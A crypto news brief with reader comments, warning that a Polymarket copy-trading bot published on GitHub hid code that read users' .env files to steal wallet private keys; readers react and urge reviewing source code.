Beware of Polymarket copy trading Bots hiding malicious code, hackers steal Private Key through .env file.

2025-12-21 03:42:09

Abstract generation in progress

[Block Rhythm] has recently encountered a serious security issue that requires everyone's vigilance. Someone has hidden malicious code in the Polymarket copy trading Bots program released on GitHub—what appears to be a normal project is actually secretly reading users' .env configuration files. As you know, this file typically contains the wallet Private Key, and once read, it means that funds are directly being moved by someone.

What’s even worse is that this developer repeatedly modified the code and submitted it to GitHub multiple times, deliberately hiding this malicious package. The security team has issued a warning, advising all users to check the trading Bots they have used, especially automated programs for copy trading. Before launching any third-party scripts, be sure to review the source code first, and don’t be tempted by convenience.

View Original

This page may contain third-party content, which is provided for information purposes only (not representations/warranties) and should not be considered as an endorsement of its views by Gate, nor as financial or professional advice. See Disclaimer for details.

15 Likes

Reward
15
9
Repost
Share

Comment

0/400

TokenTherapist

· 12-23 05:51

Another one? There really is a new eyewash every day. I just withdrew from copy trading Bots two weeks ago, and I didn't expect to have dodged a bullet. It's easy to talk about looking at the Source Code, but how many people really do that? Most people just copy, paste, and run it, and that's it. The .env file is left there to be read directly, this is just plain theft, and GitHub's review process is too lax. Submitting modifications repeatedly? That's just morally bankrupt, only thinking about how to scam money step by step. Oh my god, how many people's Private Keys are going to be lost this time? Stop using those shady tools, it's really not worth the gamble.

View OriginalReply0

WhaleWatcher

· 12-23 00:07

Damn, here we go again, GitHub really has become a paradise for hackers, can such low-level tricks still fool people? Human greed, copy trading Bots already come with risks, and now you want to check the source code before saying anything? Brothers, stop using those shady tools, your Private Key is more valuable than your life. This guy is ruthless, repeatedly submitting to cover up malicious code, he's really cunning. I need to check if my Wallet has been tampered with; once you get hit by this kind of thing, it's a total loss. There are all kinds of monsters and ghosts on GitHub now, never expose your .env file casually, folks. Why are so many people still using third-party Bots? Isn't it better to write your own scripts?

View OriginalReply0

LiquidationWizard

· 12-22 00:07

Oh my god, is this happening again? This kind of phishing code on GitHub really requires caution. The .env file directly exposes the Private Key, doesn’t this just completely reveal everything? Copy trading Bots sound great, but ended up copying your own Wallet too, unbelievable. The developers keep submitting hidden versions, this is downright naked fraud. Skipping the code review is really not an option; if anyone thinks they can be lazy and automate this, that’s the price to pay.

View OriginalReply0

FloorSweeper

· 12-21 04:12

lol watched three people lose their entire stacks to this already... paper hands panic selling rn but the real alpha was never trusting github randos in the first place ngl

Reply0

ContractTester

· 12-21 04:11

Damn, is this trap coming again? Bots on GitHub can't be trusted at all.

View OriginalReply0

CryingOldWallet

· 12-21 04:09

Oh my god, it's this trap again, the Bots on GitHub are becoming increasingly untrustworthy... Damn, the Private Key in the .env is gone? How careless do you have to be... Developers repeatedly submit hidden malicious code, this is clearly premeditated... Brothers who have used copy trading Bots should check quickly, don't wait until the Wallet is emptied to regret.

View OriginalReply0

FadCatcher

· 12-21 04:02

This is that broken place called GitHub again, really have to be careful, you can't slack off when it comes to reading code.

View OriginalReply0

GateUser-ccc36bc5

· 12-21 03:59

Here it comes again, these open source projects on GitHub really can't be trusted blindly. Moving warning, be sure to protect your Private Key. Daring to move the private key, this developer is really bold. How can there still be people using unaudited Bots? If you rush, you'll end up losing money. The .env file configuration must be strictly protected, don’t foolishly run someone else’s code directly. Planning to hide malicious code, this is no longer a bug, it’s outright Be Played for Suckers. Now anything can be listed on GitHub, you have to keep your eyes open.

View OriginalReply0

RooftopVIP

· 12-21 03:46

Wow, this method is too damaging. It maliciously submits hidden code repeatedly with premeditation, making it almost impossible to defend against. --- No wonder my previous copy trading Bots ran out of money after a while; it turns out there are really such unscrupulous developers. --- Now even GitHub has to be cautious. I have to review the Source Code myself before I dare to use it... web3 really can't tolerate any carelessness. --- Reading the Private Key directly from the .env file is insane; who would have thought? It's so malicious. --- Again it's the crypto world, again it's GitHub, and again the Private Key is stolen... when will this life ever be peaceful? --- Damn, I'm glad I've never used copy trading Bots; it seems I need to be more vigilant. --- This kind of premeditated attack is scarier than random vulnerabilities; there's simply no way to prevent it.

View OriginalReply0